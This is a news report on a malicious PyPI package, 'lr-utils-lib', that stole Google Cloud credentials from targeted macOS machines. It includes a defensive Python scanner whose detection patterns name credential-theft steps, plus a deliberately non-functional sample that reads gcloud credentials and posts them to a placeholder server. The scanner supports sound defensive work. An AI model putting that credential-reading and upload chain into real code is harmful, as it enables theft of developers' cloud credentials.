Cybersecurity researchers have discovered a malicious package in the Python Package Index (PyPI) repository that targets Apple macOS systems and aims to steal users’ Google Cloud credentials from a limited number of victims.
The package, named “lr-utils-lib”, was downloaded a total of 59 times before being removed. The package was uploaded to the registry in early June 2024.
“The malware targets specific macOS machines using a predefined list of hashes in an attempt to harvest Google Cloud authentication data,” Checkmarx researcher Yehuda Gelb said in a report published on Friday. “The harvested credentials are then sent to a remote server.”
The key aspect of this package is that it first checks whether it is installed on a macOS system and then compares the system’s Universally Unique Identifier (UUID) to a hardcoded list of 64 hashes.
If the hash of the host’s UUID appears in that predefined list, the package attempts to read two files in the ~/.config/gcloud directory that hold Google Cloud authentication data: application_default_credentials.json and credentials.db.
The captured information is sent via HTTP to a remote server, “europe-west2-workload-422915(.)cloudfunctions(.)net”.
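The behaviour chain described above (macOS check, hardware-UUID hash allowlist, gcloud credential file access, HTTP upload) lends itself to a simple static review of package source before it is installed. The scanner below is an added example written for this page, not Checkmarx’s tooling or anything from the malicious package; the indicator regexes and the three-category threshold are assumptions, and both sample sources are constructed for the test. A single category (many legitimate packages branch on `platform.system()`) is not a verdict; it is the co-occurrence of several categories that reproduces the reported chain.

```python
"""Static indicator scan for Python package source, modelled on the chain reported
for lr-utils-lib. Example code for this page, not Checkmarx's own tooling; the
indicator patterns below are assumptions derived from the published description."""
import re
from dataclasses import dataclass

# Category name -> regex. Each category maps to one step of the reported chain.
INDICATORS = {
    # step 1: only run on macOS
    "macos_check": re.compile(r"""platform\.system\(\)\s*==\s*["']Darwin["']|sys\.platform\s*==\s*["']darwin["']"""),
    # step 2: read the hardware UUID (IOPlatformUUID via ioreg on macOS)
    "hardware_uuid": re.compile(r"IOPlatformUUID|\bioreg\b"),
    # step 3: hash it for comparison against an allowlist of targets
    "hash_allowlist": re.compile(r"hashlib\.(sha256|sha1|md5)\("),
    # step 4: touch the gcloud credential files named in the report
    "gcloud_credentials": re.compile(r"\.config/gcloud|application_default_credentials\.json|credentials\.db"),
    # step 5: ship data out over HTTP
    "http_exfil": re.compile(r"requests\.post\(|urllib\.request\.urlopen\(|cloudfunctions\.net"),
}


@dataclass
class Finding:
    category: str
    line_no: int
    line: str


def scan_source(source: str) -> list:
    """Return one Finding per (category, line) hit in the given source text."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for category, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append(Finding(category, line_no, line.strip()))
    return findings


def risk_score(findings) -> int:
    """Number of distinct indicator categories hit; 5 means the whole chain is present."""
    return len({f.category for f in findings})


def is_suspicious(source: str, threshold: int = 3) -> bool:
    """Flag a source when at least `threshold` distinct categories co-occur (threshold is an assumption)."""
    return risk_score(scan_source(source)) >= threshold


# Constructed sample: a benign package that checks the platform and computes file checksums.
BENIGN_SAMPLE = """\
import platform, hashlib
def checksum(path):
    return hashlib.sha256(open(path, "rb").read()).hexdigest()
if platform.system() == "Darwin":
    print("macOS wheel selected")
"""

# Constructed sample: a non-functional sketch (undefined helpers) that mirrors the reported chain.
SUSPICIOUS_SAMPLE = """\
import platform, hashlib, os, requests
# ... package's real setup code ...
if platform.system() == "Darwin":
    machine_id = get_machine_id()          # reads IOPlatformUUID
    if hashlib.sha256(machine_id).hexdigest() in TARGET_HASHES:
        creds = os.path.expanduser("~/.config/gcloud/application_default_credentials.json")
        requests.post(REMOTE, data=open(creds).read())
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        hits = scan_source(sample)
        print(f"{name}: score={risk_score(hits)} suspicious={is_suspicious(sample)}")
        for f in hits:
            print(f"  [{f.category}] line {f.line_no}: {f.line}")
```

Run it against an unpacked sdist or wheel (for example every `.py` and `setup.py` it contains) before installing from an unfamiliar publisher; anything scoring near the full chain deserves a manual read rather than an install.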
Checkmarx said it also found a fake LinkedIn profile under the name “Lucid Zenith” that matched the package’s owner and falsely claimed to be the CEO of Apex Companies, suggesting there may have been a social engineering element to the attack.
It’s currently unclear who is behind this attack, but it comes more than two months after cybersecurity firm Phylum published details of another supply-chain attack involving a Python package called “requests-darwin-lite” that was found to trigger malicious behavior after checking the UUID of a macOS host.
These campaigns indicate that threat actors have advance knowledge of the macOS systems they want to infiltrate, and go to great lengths to ensure that malicious packages are only distributed to specific machines.
Checkmarx’s report also describes tactics used by malicious actors to distribute similar packages and trick developers into including them in their applications.
“It is unclear whether this attack was targeted at individuals or businesses, but such attacks could have significant impacts on businesses,” Gelb said. “The initial compromise typically occurs on an individual developer’s machine, but the impact to a business could be significant.”